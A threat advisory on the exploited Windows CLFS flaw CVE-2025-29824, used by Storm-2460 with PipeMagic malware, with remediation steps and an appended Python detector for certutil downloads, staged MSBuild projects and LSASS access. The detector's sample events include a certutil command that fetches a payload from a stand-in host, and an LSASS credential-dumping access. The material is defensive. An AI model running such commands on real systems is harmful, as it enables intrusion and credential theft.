CVE-2025-29824 – Microsoft Windows CLFS Driver Vulnerability Exploit in the Wild
April 9, 2025
Severity
High
Analysis Summary
Microsoft disclosed that a now-patched Windows zero-day vulnerability, CVE-2025-29824, affecting the Common Log File System (CLFS), was exploited in ransomware attacks against a limited set of targets. These included IT and real estate organizations in the U.S., a financial entity in Venezuela, a Spanish software company, and a retail sector company in Saudi Arabia. CVE-2025-29824 is a privilege escalation flaw that allows attackers to gain SYSTEM privileges and was addressed in Microsoft's April 2025 Patch Tuesday updates.
The attacks are attributed to a threat group Microsoft tracks as Storm-2460. The group used a malware tool called PipeMagic, a plugin-based trojan active since 2022, to deliver the exploit and ransomware payloads. PipeMagic was launched through a malicious MSBuild file containing an encrypted payload. Notably, this is the second zero-day vulnerability delivered via PipeMagic, following CVE-2025-24983, a Win32 Kernel Subsystem bug patched last month.
The exact initial access method is unknown, but the attackers used certutil to download malware from a compromised legitimate site. Exploitation involved targeting the CLFS driver to trigger memory corruption and using the RtlSetAllBits API to escalate privileges, granting full SYSTEM access. Post-exploitation activities included LSASS memory dumping to extract credentials and file encryption using a random extension.
Although Microsoft could not obtain a ransomware sample, the ransom note pointed to a TOR domain linked to the RansomEXX family. The company emphasized that ransomware actors prioritize privilege escalation vulnerabilities like CVE-2025-29824 to convert initial low-level access into full administrative control, enabling rapid ransomware deployment across compromised environments. PipeMagic has previously been associated with Nokoyawa ransomware attacks exploiting another CLFS vulnerability (CVE-2023-28252).
Impact
- Gain Access
- Privilege Escalation
- Credential Theft
Indicators of Compromise
CVE
CVE-2025-29824
CVE-2025-24983
CVE-2023-28252
Remediation
- Apply the official security patch from Microsoft released in April 2025 to fix CVE-2025-29824.
- Upgrade systems to Windows 11 version 24H2 or later, which is not affected by this vulnerability.
- Disable or restrict use of certutil and MSBuild tools in environments where they are not required.
- Monitor for abnormal use of legitimate tools like certutil, especially downloading from unknown URLs.
- Implement application whitelisting to block unauthorized or suspicious executables and scripts.
- Use endpoint detection and response (EDR) solutions to detect exploitation techniques and post-compromise behavior.
- Regularly update antivirus and security tools to recognize and block PipeMagic and related malware.
- Audit and restrict privileges to prevent unauthorized access to SeDebugPrivilege and sensitive system APIs.
- Monitor network traffic for signs of data exfiltration or communication with TOR domains.
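As an added illustration of the monitoring guidance above (not code from the advisory, Microsoft, or the referenced reports), this Python scans endpoint telemetry for the three behaviours the analysis describes: certutil fetching from a URL, MSBuild loading a project from a staging directory, and an unexpected process opening LSASS. The event field names, the staging-directory list and the allow-list of LSASS readers are assumptions, and the sample events are constructed.

```python
import re

# Heuristic patterns (assumptions, tune them to the environment).
URL_RE = re.compile(r"\b(?:https?|ftp)://\S+", re.IGNORECASE)
STAGING_RE = re.compile(r"\\(?:ProgramData|Users\\Public|Temp|AppData)\\", re.IGNORECASE)
# Processes expected to open LSASS; anything else reading its memory is suspect.
LSASS_READERS_OK = {"msmpeng.exe", "csrss.exe", "wininit.exe"}

def _base(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def check_event(ev: dict) -> list[str]:
    """Return the names of every detection rule a single telemetry event matches."""
    hits = []
    image = _base(ev["image"])
    if ev["kind"] == "process_create":
        cmd = ev["cmdline"]
        if image == "certutil.exe" and URL_RE.search(cmd):
            hits.append("certutil-download")        # LOLBin used to fetch a payload
        if image == "msbuild.exe" and STAGING_RE.search(cmd):
            hits.append("msbuild-staged-project")   # build tool fed a project from a drop dir
    elif ev["kind"] == "process_access":
        if _base(ev["target"]) == "lsass.exe" and image not in LSASS_READERS_OK:
            hits.append("lsass-access")             # possible credential dumping
    return hits

def scan(events: list[dict]) -> dict[int, list[str]]:
    """Map event index -> matched rules, omitting events with no hits."""
    return {i: h for i, ev in enumerate(events) if (h := check_event(ev))}

# Constructed sample telemetry (hypothetical, not IoCs from the advisory).
SAMPLE_EVENTS = [
    {"kind": "process_create", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -urlcache -split -f http://example.invalid/u.bin C:\ProgramData\u.bin"},
    {"kind": "process_create", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -hashfile C:\tools\setup.msi SHA256"},
    {"kind": "process_create", "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "cmdline": r"MSBuild.exe C:\ProgramData\loader.proj"},
    {"kind": "process_create", "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "cmdline": r"MSBuild.exe C:\src\app\app.sln /t:Build"},
    {"kind": "process_access", "image": r"C:\ProgramData\loader.exe",
     "target": r"C:\Windows\System32\lsass.exe"},
    {"kind": "process_access", "image": r"C:\ProgramData\Microsoft\Windows Defender\MsMpEng.exe",
     "target": r"C:\Windows\System32\lsass.exe"},
]

if __name__ == "__main__":
    for idx, rules in scan(SAMPLE_EVENTS).items():
        print(idx, rules)
```

Benign uses of the same tools (a hash check with certutil, a build launched from a source tree, Defender reading LSASS) produce no hits, which is the false-positive behaviour to preserve when tuning the patterns.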